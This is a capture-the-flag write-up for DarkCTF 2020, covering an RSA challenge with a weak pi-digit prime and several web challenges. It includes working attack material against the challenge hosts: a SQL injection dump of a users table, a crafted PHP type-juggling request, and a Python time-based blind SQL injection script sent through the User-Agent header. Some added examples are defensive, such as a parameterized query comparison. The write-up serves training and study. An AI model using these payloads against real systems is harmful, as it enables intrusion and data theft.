DarkCTF 2020 Write-Up

Misc

1. Sanity Check.

Cryptography

1. Pipe Rhyme

Chall:- Pipe Rhyme
Chall Desc:- Wow you are so special.
N=0x3b7c97ceb5f01f8d2095578d561cad0f22bf0e9c94eb35a9c41028247a201a6db95f
e=0x10001
ct=0x1B5358AD42B79E0471A9A8C84F5F8B947BA9CB996FA37B044F81E400F883A309B886
N=1763350599372172240188600248087473321738860115540927328389207609428163138985769311
e=65537
ct=810005773870709891389047844710609951449521418582816465831855191640857602960242822
p=31415926535897932384626433832795028841
q=56129192858827520816193436882886842322337671
phi = (p-1)*(q-1)
phi = (31415926535897932384626433832795028841-1)*(56129192858827520816193436882886842322337671-1)
phi = 1763350599372172240188600248087473321682730891266173271675081787918842463868402800
from Crypto.Util.number import inverse
d=inverse(e, phi)
m=pow(ct,d,N)
hex(m)
results:0x6461726b4354467b34763069445f7573316e67675f70315f7072316d65737d
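
The prime p above is the first 38 decimal digits of pi, which is why this modulus factors instantly. As an added example (not part of the original write-up), this Python sketch audits a modulus for a factor built from the leading digits of pi and, for the challenge values on this page, recovers the plaintext; the function names are hypothetical.

```python
# Added example: audit an RSA modulus for a factor made of leading pi digits.
# Function names are hypothetical; N, E, CT are the challenge values above.

# First 50 decimal digits of pi, decimal point removed.
PI_DIGITS = "31415926535897932384626433832795028841971693993751"

N = 0x3b7c97ceb5f01f8d2095578d561cad0f22bf0e9c94eb35a9c41028247a201a6db95f
E = 0x10001
CT = 0x1B5358AD42B79E0471A9A8C84F5F8B947BA9CB996FA37B044F81E400F883A309B886


def constant_prefix_factor(n, digits=PI_DIGITS, min_len=8):
    """Return a nontrivial divisor of n that is a prefix of `digits`, else None."""
    for length in range(min_len, len(digits) + 1):
        candidate = int(digits[:length])
        if candidate >= n:
            break
        if n % candidate == 0:
            return candidate
    return None


def decrypt_with_factor(n, e, ct, p):
    """Rebuild the private exponent from one known prime factor and decrypt."""
    q, remainder = divmod(n, p)
    if remainder:
        raise ValueError("p does not divide n")
    phi = (p - 1) * (q - 1)
    d = pow(e, -1, phi)  # modular inverse, needs Python 3.8+
    m = pow(ct, d, n)
    return m.to_bytes((m.bit_length() + 7) // 8, "big")


if __name__ == "__main__":
    p = constant_prefix_factor(N)
    print("pi-prefix factor:", p)
    if p is not None:
        print("plaintext:", decrypt_with_factor(N, E, CT, p))
```

The same check works for any other well-known constant by passing its digit string as `digits`.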

Forensics

1. AW

Reversing

1. so_much

Linux

1. linux starter

2. Find-Me

su -l wolf2

Web

1. Apache Logs

2. Simple_SQL

http://simplesql.darkarmy.xyz/
http://simplesql.darkarmy.xyz/index.php?id=*
for x in {0..100};do curl "simplesql.darkarmy.xyz/index.php?id=$x" | grep Username;done

3. So_Simple

http://web.darkarmy.xyz:30001/index.php?id=1'
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1'' LIMIT 0,1' at line 1
available databases [5]:
[*] id14831952_security
[*] information_schema
[*] mysql
[*] performance_schema
[*] sys
Database: id14831952_security
Table: users
[9 entries]
+----------+-----------------------------------+---------------+
| id       | password                          | username      |
+----------+-----------------------------------+---------------+
| 1        | Try                               | LOL           |
| 2        | another                           | Try           |
| 3        | p@ssword                          | fake          |
| 4        | dont try to hack                  | its secure    |
| 5        | easy                              | not           |
| 6        | my database                       | dont read     |
| 7        | new                               | try to think  |
| 8        | darkCTF{this_is_not_a_flag}       | admin         |
| 56465219 | darkCTF{uniqu3_ide4_t0_find_fl4g} | flag          |
+----------+-----------------------------------+---------------+

4. PHP Information

<!DOCTYPE html> 
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Corona Web</title>
</head>
<body>


<style>
body{
background-color: whitesmoke
}
</style>
<?php

include "flag.php";

echo show_source("index.php");

if (!empty($_SERVER['QUERY_STRING'])) {
    $query = $_SERVER['QUERY_STRING'];
    $res = parse_str($query);
    if (!empty($res['darkctf'])){
        $darkctf = $res['darkctf'];
    }
}

if ($darkctf === "2020"){
    echo "<h1 style='color: chartreuse;'>Flag : $flag</h1></br>";
}

if ($_SERVER["HTTP_USER_AGENT"] === base64_decode("MjAyMF90aGVfYmVzdF95ZWFyX2Nvcm9uYQ==")){
    echo "<h1 style='color: chartreuse;'>Flag : $flag_1</h1></br>";
}

if (!empty($_SERVER['QUERY_STRING'])) {
    $query = $_SERVER['QUERY_STRING'];
    $res = parse_str($query);
    if (!empty($res['ctf2020'])){
        $ctf2020 = $res['ctf2020'];
    }
    if ($ctf2020 === base64_encode("ZGFya2N0Zi0yMDIwLXdlYg==")){
        echo "<h1 style='color: chartreuse;'>Flag : $flag_2</h1></br>";
    }
}

if (isset($_GET['karma']) and isset($_GET['2020'])) {
    if ($_GET['karma'] != $_GET['2020'])
        if (md5($_GET['karma']) == md5($_GET['2020']))
            echo "<h1 style='color: chartreuse;'>Flag : $flag_3</h1></br>";
        else
            echo "<h1 style='color: chartreuse;'>Wrong</h1></br>";
}

?>
</body>
</html> 1
GET /index.php?darkctf=2020&ctf2020=WkdGeWEyTjBaaTB5TURJd0xYZGxZZz09&karma[]=[]&2020[]=0e54321 HTTP/1.1
Host: php.darkarmy.xyz:7001
User-Agent: 2020_the_best_year_corona
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: __cfduid=d0bc2a2c6f64d7e52d18c3476fc9b82791600053627
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0

5. Agent-U

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '172.69.69.218', 'admin')' at line 1
The time is shown in the bottom-right corner.
#!/usr/bin/env python3
import requests
import time
import json

# Local intercepting proxy (defined here but never passed to requests)
http_proxy = "http://127.0.0.1:8080"
proxyDict = {
    "http": http_proxy,
}

# Candidate characters: a-z, 0-9 and "_"
alpha = [chr(x) for x in range(0x61, 0x7b)]
for x in range(0, 10):
    alpha.append(str(x))
alpha.append("_")

req = requests.Session()
data = {"uname": "admin", "passwd": "admin", "submit": "Submit"}

# For each position, the guess that delays the response by 3 seconds is the matching character
for x in range(1, 35):
    for c in alpha:
        st = time.time()
        headers = {"User-Agent": f"tes',IF(MID(DATABASE(),{x},1) = '{c}', SLEEP(3), 0),'inersin')-- -"}
        req.post("http://agent.darkarmy.xyz/", data=data, timeout=10, headers=headers)
        if int(time.time() - st) >= 3:
            print(c)
            break
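
The MySQL error above suggests the User-Agent header is placed inside the VALUES list of an INSERT. As an added example (not the challenge's code, which the write-up does not show), this Python sketch puts a concatenated INSERT next to a parameterized one; the uagents table, its columns and the function names are assumptions, and SQLite stands in for MySQL.

```python
import sqlite3

# Constructed header value with the same shape as the one in the script above,
# but with plain strings in place of the IF/SLEEP expression.
FORGED_UA = "tes', 'forged-ip', 'forged-user')-- -"


def make_db():
    # Hypothetical logging table: one row per request.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE uagents (uagent TEXT, ip TEXT, uname TEXT)")
    return db


def log_concatenated(db, user_agent, ip, uname):
    # Vulnerable: the header text becomes part of the SQL statement.
    db.execute(
        "INSERT INTO uagents (uagent, ip, uname) "
        f"VALUES ('{user_agent}', '{ip}', '{uname}')"
    )


def log_parameterized(db, user_agent, ip, uname):
    # Hardened: the driver binds each value as data, never as SQL.
    db.execute(
        "INSERT INTO uagents (uagent, ip, uname) VALUES (?, ?, ?)",
        (user_agent, ip, uname),
    )


def run(logger, user_agent):
    """Log one request and return the stored rows, or the SQL error text."""
    db = make_db()
    try:
        logger(db, user_agent, "172.69.69.218", "admin")
    except sqlite3.Error as exc:
        return f"error: {exc}"
    return db.execute("SELECT uagent, ip, uname FROM uagents").fetchall()


if __name__ == "__main__":
    for ua in ("Mozilla/5.0", "Mozilla'", FORGED_UA):
        print(repr(ua))
        print("  concatenated :", run(log_concatenated, ua))
        print("  parameterized:", run(log_parameterized, ua))
```

With the concatenated version a lone quote produces a syntax error like the one shown above, and the constructed value replaces the logged IP and username; the parameterized version stores every header verbatim.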

PARSECT // IT Security Enthusiast // STOICISM // KEEP DO SOMETHING LEGAL

InersIn
